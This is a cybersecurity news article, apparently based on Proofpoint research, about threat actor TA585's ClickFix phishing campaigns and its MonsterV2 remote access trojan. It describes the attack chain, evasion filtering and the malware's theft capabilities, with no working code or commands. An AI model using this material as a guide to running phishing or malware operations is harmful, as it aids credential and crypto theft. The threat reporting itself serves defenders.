Fully Autonomous Cybercrime: TA585 Uses ClickFix Phishing and Own Infrastructure to Deploy Premium MonsterV2 RAT
Ddos 
IRS Themed ClickFix Landing leading to MonsterV2 | Image: Proofpoint
Proofpoint has identified a new and highly self-reliant cybercriminal threat actor, tracked as TA585, which operates with an unusual degree of independence in today’s cybercrime economy. Unlike most malware distributors who rely on initial access brokers or third-party delivery services, TA585 controls every stage of its attack chain — from infrastructure and delivery to payload deployment.
Proofpoint first detected TA585’s activity in February 2025, when the group used U.S. Internal Revenue Service (IRS)-themed phishing emails containing links to malicious PDFs. The documents redirected victims to compromised sites that displayed fake verification pages using ClickFix technique.
Victims were instructed to manually execute a PowerShell command via the Windows “Run” dialog box, unknowingly initiating the download of MonsterV2.
“Messages contained URLs linking to a PDF which would open in the browser. The PDF linked to a webpage that was using the ClickFix technique, which lures visitors to manually run a malicious command in the Windows Run-box or PowerShell terminal.”
Subsequent campaigns in March 2025 impersonated both the IRS and the U.S. Small Business Administration (SBA), primarily targeting finance and accounting firms with fewer than 200 phishing messages per wave.
By April 2025, Proofpoint observed TA585 evolving into a fully autonomous operator. The group registered and maintained its own malicious infrastructure, identified by researchers as CoreSecThree, which hosted web injects and filtering systems to deliver payloads only to human targets.
“TA585 activity is typically distributed via compromised websites… The websites have been compromised with a malicious JavaScript injection. This injection causes the website to load a malicious script which, in campaigns so far this year, is used to create an overlay of the compromised website to present a fake CAPTCHA (ClickFix) instructing users to verify they are human.”
This fake CAPTCHA overlay is an intelligent evasion method: if the user follows the prompt, the PowerShell command triggers the malware download. Once executed, the infected system is verified and redirected to a legitimate webpage, minimizing suspicion.
Beyond web injects, TA585 has experimented with GitHub notification abuse to reach developers and technical targets. In these campaigns, the actor created fake GitHub issues and tagged legitimate users, prompting automated GitHub emails containing malicious shortened URLs.
These URLs led to actor-controlled sites hosting fake GitHub-branded verification pages that used the same CoreSecThree filtering and beaconing methods, ultimately downloading Rhadamanthys or MonsterV2 malware.
At the heart of TA585’s campaigns is MonsterV2, a feature-rich Remote Access Trojan (RAT), stealer, and loader first observed for sale on cybercrime forums in February 2025.
Proofpoint researchers describe MonsterV2 as “advertised as a remote access trojan (RAT), stealer, and loader… It is expensive compared to its peer malware families, and used by only a small number of actors, including TA585.”
The malware is coded in C++, Go, and TypeScript, featuring an advanced architecture with built-in RAII wrappers, thread safety, and ChaCha20 encryption for configuration and C2 communication. Its functionalities include:
- Credential, browser, and crypto wallet theft
- Clipboard hijacking (crypto address replacement)
- Hidden Virtual Network Computing (HVNC) for stealth remote control
- Command execution via PowerShell or CMD
- Screen recording, webcam access, and keylogging
Proofpoint notes, “MonsterV2 has capabilities of a remote access trojan (RAT), loader, and stealer… It avoids infecting computers in Commonwealth of Independent States (CIS) countries.”
Pricing on underground forums reflects its premium status: the “Standard” version costs $800/month, while the “Enterprise” tier — which includes full HVNC, loader, and stealer modules — runs $2,000/month.
The malware uses a custom crypter called SonicCrypt for obfuscation, which Proofpoint describes as “a modern technological crypt with many functions, prompt cleaning and professional support.”
MonsterV2 employs ChaCha20 encryption to protect both its configuration and C2 communications.
“The config is decrypted using ChaCha20… The malware reads the first 32 bytes prior to its config as key material, combines it with a hardcoded master key, and decrypts the configuration.”
After connecting to its command-and-control server, the malware transmits detailed system metadata — including the OS version, geolocation, username, and external IP — then waits for further instructions.
The C2 can issue a variety of commands, from data exfiltration and process manipulation to HVNC session creation and ransomware-like shutdowns.
Related Posts:
- Proposed US Ban on Chinese Tech Impacts Autonomous Vehicles
- ClickFix Phishing: New Automated Kits Trick Users Into Manually Running Malware and Stealers
- State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
- Cloudflare Sets New Standard by Auto-Mitigating Record-Breaking 3.8 Tbps DDoS Attack
- ClickFix: The Rising Threat of Clipboard-Based Social Engineering
Donate